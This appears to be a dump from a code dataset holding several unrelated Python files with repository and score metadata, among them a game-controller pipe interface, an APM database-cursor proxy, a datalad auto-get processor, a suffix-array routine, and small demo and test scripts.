action_dim = 50
def __init__(self, path, player_id, port=None):
super(Pad, self).__init__()
"""Create, but do not open the fifo."""
self.pipe = None
self.path = path + 'georges_' + str(player_id)
self.windows = port is not None
self.port = port
self.player_id = player_id
self.message = ""
self.action_space = []
self.previous_state = ControllerState()
def connect(self):
if self.windows:
context = zmq.Context()
with open(self.path, 'w') as f:
f.write(str(self.port))
self.pipe = context.socket(zmq.PUSH)
address = "tcp://127.0.0.1:%d" % self.port
print("Binding pad %s to address %s" % (self.path, address))
self.pipe.bind(address)
else:
try:
os.unlink(self.path)
except:
pass
os.mkfifo(self.path)
self.pipe = open(self.path, 'w', buffering=1)
def unbind(self):
if not self.windows:
self.pipe.close()
try:
os.unlink(self.path)
except Exception:
pass
self.message = ""
def flush(self):
if self.windows:
self.pipe.send_string(self.message)
else:
self.pipe.write(self.message)
self.message = ""
def write(self, command, buffering=False):
self.message += command + '\n'
if not buffering:
self.flush()
def press_button(self, button, buffering=False):
"""Press a button."""
#assert button in Button or button in UsefullButton
self.write('PRESS {}'.format(button), buffering)
def release_button(self, button, buffering=False):
"""Release a button."""
#assert button in Button or button in UsefullButton
self.write('RELEASE {}'.format(button), buffering)
def press_trigger(self, trigger, amount, buffering=False):
"""Press a trigger. Amount is in [0, 1], with 0 as released."""
#assert trigger in Trigger or trigger in UsefullButton
#assert 0 <= amount <= 1
self.write('SET {} {:.2f}'.format(trigger, amount), buffering)
def tilt_stick(self, stick, x, y, buffering=False):
"""Tilt a stick. x and y are in [0, 1], with 0.5 as neutral."""
#assert stick in Stick
#assert 0 <= x <= 1 and 0 <= y <= 1
self.write('SET {} {:.2f} {:.2f}'.format(stick, x, y), buffering)
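    # Example lines the helpers above write to the pipe (the actual button/stick/trigger
    # names come from input.enums and are not shown in this file):
    #   "PRESS A", "RELEASE B", "SET L 0.50", "SET MAIN 0.50 0.50"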
def reset(self):
for button in Button:
self.release_button(button)
for trigger in Trigger:
self.press_trigger(trigger, 0)
for stick in Stick:
self.tilt_stick(stick, 0.5, 0.5)
| 2.46875 | 2 |
Special Midterm Exam in OOP.py | Jerohlee/OOP-1-2 | 0 | 12799139 | <gh_stars>0
from tkinter import *
window = Tk()
window.title("Special Midterm Exam in OOP")
window.geometry("300x200+20+10")
def changecolor():
button.configure(bg="yellow")
button = Button(window, text = "Click to Change Color", command= changecolor)
button.place(relx=.5, y=100, anchor="center")
window.mainloop() | 3.390625 | 3 |
apminsight/instrumentation/dbapi2.py | Wealize/apminsight-site24x7-py | 0 | 12799140 | from apminsight import constants
from apminsight.util import is_non_empty_string
from apminsight.agentfactory import get_agent
from .wrapper import default_wrapper
class CursorProxy():
def __init__(self, cursor, conn):
self._apm_wrap_cursor = cursor
self._apm_wrap_conn = conn
self._apm_check_and_wrap('execute')
self._apm_check_and_wrap('executemany')
def __getattr__(self, key):
if key in self.__dict__:
return getattr(self, key)
return getattr(self._apm_wrap_cursor, key)
def __setattr__(self, key, value):
if( key in ['_apm_wrap_cursor', '_apm_wrap_conn', 'execute', 'executemany']):
self.__dict__[key] = value
else:
            return setattr(self._apm_wrap_cursor, key, value)
def _apm_check_and_wrap(self, attr):
if hasattr(self._apm_wrap_cursor, attr):
actual = getattr(self._apm_wrap_cursor, attr)
attr_info = {
constants.method_str : attr,
constants.component_str : self._apm_wrap_conn._apm_comp_name,
constants.extract_info : self._apm_extract_query,
constants.is_db_tracker : True
}
wrapper = default_wrapper(actual, 'Cursor', attr_info)
setattr(self, attr, wrapper)
def _apm_extract_query(self, tracker, args=(), kwargs={}, return_value=None):
tracker.set_info(self._apm_wrap_conn._apm_host_info)
threshold = get_agent().get_threshold()
if threshold.is_sql_capture_enabled() is not True:
return
if isinstance(args, (list, tuple)) and len(args)>0:
if is_non_empty_string(args[0]):
tracker.set_info({'query' : args[0]})
class ConnectionProxy():
def __init__(self, conn, comp, host_info):
self._apm_wrap_conn = conn
self._apm_comp_name = comp
self._apm_host_info = host_info
def cursor(self, *args, **kwargs):
real_cursor = self._apm_wrap_conn.cursor(*args, **kwargs)
cur = CursorProxy(real_cursor, self)
return cur
def __getattr__(self, key):
if key in self.__dict__:
return getattr(self, key)
return getattr(self._apm_wrap_conn, key)
def __setattr__(self, key, value):
if( key in ['_apm_wrap_conn', '_apm_comp_name', '_apm_host_info']):
self.__dict__[key] = value
else:
return setattr(self._apm_wrap_conn, key, value)
@staticmethod
def get_host_info(method_info, conn_kwargs):
host_info = {}
if constants.host in conn_kwargs:
host_info[constants.host] = conn_kwargs[constants.host]
elif constants.default_host in method_info:
            host_info[constants.host] = method_info[constants.default_host]
if constants.port in conn_kwargs:
host_info[constants.port] = str(conn_kwargs[constants.port])
elif constants.default_port in method_info:
host_info[constants.port] = method_info[constants.default_port]
return host_info
@staticmethod
def instrument_conn(original, module, method_info):
def conn_wrapper(*args, **kwargs):
conn = original(*args, **kwargs)
if conn is not None:
comp = method_info.get(constants.component_str, '')
host_info = ConnectionProxy.get_host_info(method_info, kwargs)
new_conn = ConnectionProxy(conn, comp, host_info)
return new_conn
return conn
return conn_wrapper
| 2.125 | 2 |
casclik/controllers/__init__.py | mahaarbo/casclik | 14 | 12799141 | from casclik.controllers.reactive_qp import ReactiveQPController
from casclik.controllers.reactive_nlp import ReactiveNLPController
from casclik.controllers.pseudo_inverse import PseudoInverseController
from casclik.controllers.model_predictive import ModelPredictiveController
| 1.078125 | 1 |
datalad_metalad/processor/autoget.py | yarikoptic/datalad-metalad | 7 | 12799142 | <filename>datalad_metalad/processor/autoget.py<gh_stars>1-10
import logging
from .base import Processor
from ..pipelineelement import (
PipelineResult,
ResultState,
PipelineElement,
)
from ..utils import check_dataset
logger = logging.getLogger("datalad.metadata.processor.autoget")
class AutoGet(Processor):
"""
This processor "gets" a file that is annexed and not locally available.
It sets a flag in the element that will allow the AutoDrop-processor
to automatically drop the file again.
"""
def __init__(self):
super().__init__()
def process(self, pipeline_element: PipelineElement) -> PipelineElement:
for traverse_result in pipeline_element.get_result("dataset-traversal-record"):
if traverse_result.type == "File":
path = traverse_result.path
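                # a broken symlink here means the annexed content has not been fetched yet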
if path.is_symlink():
if path.exists() is False:
fs_dataset_path = (
traverse_result.fs_base_path
/ traverse_result.dataset_path
)
dataset = check_dataset(str(fs_dataset_path), "auto_get")
logger.debug(
f"AutoGet: automatically getting {path} "
f"in dataset {dataset.path}")
dataset.get(str(traverse_result.path), jobs=1)
pipeline_element.set_result(
"auto_get",
[PipelineResult(ResultState.SUCCESS)])
return pipeline_element
| 2.34375 | 2 |
string_09.py | Technicoryx/python_strings_inbuilt_functions | 0 | 12799143 | """The Python program below demonstrates the
encode() method of strings."""
#Utf-8 Encoding
# unicode string
string = 'pythön!'
# print string
print('The string is:', string)
# default encoding to utf-8
string_utf = string.encode()
# print result
print('The encoded version is:', string_utf)
# unicode string
string = 'pythön!'
# print string
print('The string is:', string)
# ignore error
print('The encoded version (with ignore) is:', string.encode("ascii", "ignore"))
# replace error
print('The encoded version (with replace) is:', string.encode("ascii", "replace"))
| 4.15625 | 4 |
answer/0066/66.linningmii.py | linningmii/leetcode | 15 | 12799144 | <gh_stars>10-100
class Solution:
def plusOne(self, digits):
"""
:type digits: List[int]
:rtype: List[int]
"""
result = digits[:]
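        # walk the digits from least to most significant, turning 9s into 0 until the carry is absorbed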
for i in range(len(result) - 1, -1, -1):
if result[i] == 9:
result[i] = 0
if i == 0:
result.insert(0, 1)
else:
result[i] += 1
return result
return result
| 3.0625 | 3 |
rl-fmri/tmp_load_zip.py | liusida/thesis-bodies | 0 | 12799145 | <reponame>liusida/thesis-bodies
from stable_baselines3 import PPO
filename = "exp5/model-ant-400-500-600-s0.zip"
model = PPO.load(filename)
print(model) | 1.390625 | 1 |
tests/test_weatherman_butler.py | aecobb53/weatherman | 1 | 12799146 | from weatherman import weather_butler
import pytest
import datetime # noqa
import sqlite3 # noqa
import yaml
import json # noqa
import os
import unittest.mock
mock = unittest.mock.Mock()
master_config = 'etc/weatherman.yml'
with open(master_config) as ycf:
config = yaml.load(ycf, Loader=yaml.FullLoader)
environment = os.environ.get('ENVIRONMENT')
@pytest.fixture(scope="function")
def setup_wb():
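    # a fresh WeatherButler wired to the unit-test database for each test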
wb = weather_butler.WeatherButler('db/weatherman_unit')
return wb
# def test_get_response():
# def test_format_request_city_id_list():
# def test_format_response():
# def test_poll():
| 2.375 | 2 |
Bioinformatics VI/Week II/SuffixArray.py | egeulgen/Bioinformatics_Specialization | 3 | 12799147 | <gh_stars>1-10
import sys
def SuffixArray(Text):
''' Suffix Array
Input: A string Text.
Output: SuffixArray(Text).
'''
suffixes = []
suffix_array = []
for i in range(len(Text)):
suffixes.append(Text[i:])
suffix_array.append(i)
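    # sort the start positions by the lexicographic order of their suffixes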
suffix_array = [x for _, x in sorted(zip(suffixes, suffix_array), key=lambda pair: pair[0])]
return suffix_array
if __name__ == "__main__":
Text = sys.stdin.read().rstrip()
suffix_array = SuffixArray(Text)
print(', '.join(str(x) for x in suffix_array)) | 3.4375 | 3 |
ppo/mineRL.py | icrdr/pytorch-playground | 0 | 12799148 | <gh_stars>0
import minerl
import gym
import logging
logging.basicConfig(level=logging.DEBUG)
env = gym.make('MineRLNavigateDense-v0')
print('v')
obs = env.reset()
done = False
net_reward = 0
while not done:
action = env.action_space.noop()
print(action)
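    # steer the camera toward the compass target (yaw proportional to the compass angle)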
action['camera'] = [0, 0.03 * obs["compassAngle"]]
action['back'] = 0
action['forward'] = 1
action['jump'] = 1
action['attack'] = 1
obs, reward, done, info = env.step(action)
env.render()
net_reward += reward
print("Total reward: ", net_reward)
| 2.28125 | 2 |
200914/04.lists.py | Floou/python-basics | 0 | 12799149 | <reponame>Floou/python-basics
say = 'всем привет!'
print(say) | 1.640625 | 2 |
BOCSite/boc/apps.py | dylodylo/Betting-Odds-Comparision | 2 | 12799150 | from django.apps import AppConfig
class BocConfig(AppConfig):
name = 'boc'
| 1.15625 | 1 |